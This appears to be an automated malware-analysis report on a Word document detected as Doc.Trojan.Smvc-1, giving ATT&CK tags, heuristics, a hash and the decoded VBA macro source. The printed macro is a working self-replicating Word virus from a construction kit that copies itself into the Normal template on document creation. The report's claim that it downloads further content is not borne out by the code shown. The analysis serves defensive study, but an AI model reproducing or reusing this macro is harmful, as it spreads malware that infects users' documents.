MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature Doc.Trojan.Smvc-1. Static analysis revealed the presence of VBA macros within the document. These macros are highly suspicious and likely intended to download and execute additional malicious content, a common tactic for initial compromise. The file's SHA256 hash is provided as a primary IOC.
Heuristics (2)
- ClamAV: Doc.Trojan.Smvc-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Smvc-1
- VBA macros detected (medium, OLE_VBA_MACROS): Document contains VBA macro code
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4197 bytes |

SHA-256: 2a65c58470bee8ac39fb1677adf747cd5488f01703688cf46c04c4aca2c0bd12
Detection: ClamAV: Doc.Trojan.Smvc-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script)
```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Modul1"
'*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*
'$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$
'*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*
' __ __
' | | | |
' _|__|_|__|_ ____ ____ _________ _________ _________ ____ ____ ___ ________
'/ \ / \ / \ / \ / \ / \ / \ / \ / \ / \
'| ________| | \ / | | ___ | | ___ | | | | | | | | | | _____/
'| | | \/ | | / \ | | / \ | | | | | | | \___/ | |
'| |________ | | | | | | | | | | |__ __| | |_| | ___ | |__
'| \ | | | | | | | | | | | | | | | | | |
'|______ | | |\ /| | | | | | | | | | | | | _ | | | | __|
' | | | | \/ | | | | | | | | | | | | | | | | | | | |
' ______| | | | | | | \___/ | | \___/ | | | | | | | | | | |____
'| | | | | | | | | | | | | | | | | | | \
'\___________/ \____/ \____/ \_________/ \_________/ \___/ \____/ \____/ \___/ \________/
' | | | | - $MOOTHiE Da HuStla [ZeroGravity]
' |__| |__| - August 15, 2000
'
'*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*
'$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$
'*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*
'Virus Creation: 09/09/00 13.39.58
'$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$
'$* Poly = No $*
'$* Retro = No $*
'$* Infection = New $*
'$* Payload = No $*
'$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$
|-----====== CODE Starts ======-----|
Private Sub Document_New()
On Error Resume Next
'Author: 1
'Name: 1
'Comments: 1
'Origin: 1
'This Word2000 virus was created using $MOOTHiE Da HuStla's Macro Virus Creator 2000 Ver 2.0
On Error Resume Next: Randomize: Dim DocCode As Object, NormCode As Object
Set AAA1 = Activedocument: Set AAA2 = AAA1.VBProject: Set AAA3 = AAA2.VBComponents
Set AAA4 = AAA3.Item(1): Set DocCode = AAA4.CodeModule
Set BBB1 = NormalTemplate: Set BBB2 = BBB1.VBProject: Set BBB3 = BBB2.VBComponents
Set BBB4 = BBB3.Item(1): Set NormCode = BBB4.CodeModule
XXXA = (23250758647918.7 - 23250758647918.7 + 46450978517.0678 + 46450978517.0678 - (46450978516.5678 * 2))
XXXB = (23250758647918.7 - 23250758647915.7 + 46450978517.0678 + 46450978517.0678 - (46450978517.0678 * 2))
AAA = NormCode.lines(XXXB, XXXA)
BBB = DocCode.lines(XXXB, XXXA)
CCC = ""
If AAA = CCC Then GoTo XXXC
If BBB = CCC Then GoTo XXXD
XXXC:
Do Until XXXE = DocCode.countoflines
XXXE = XXXE + XXXA
AAA = AAA + DocCode.lines(XXXE, XXXA) & vbCr
Loop
NormCode.insertlines XXXA, AAA
GoTo XXXF
XXXD:
Do Until XXXE = NormCode.countoflines
XXXE = XXXE + XXXA
AAA = AAA + NormCode.lines(XXXE, XXXA) & vbCr
Loop
DocCode.insertlines XXXA, CCC
XXXF:
Activedocument.Save: NormalTemplate.Save
End Sub
Private Sub Document_Close()
On Error Resume Next
End Sub
|-----====== CODE Ends ======-----|
*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*
$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$
```
... (truncated)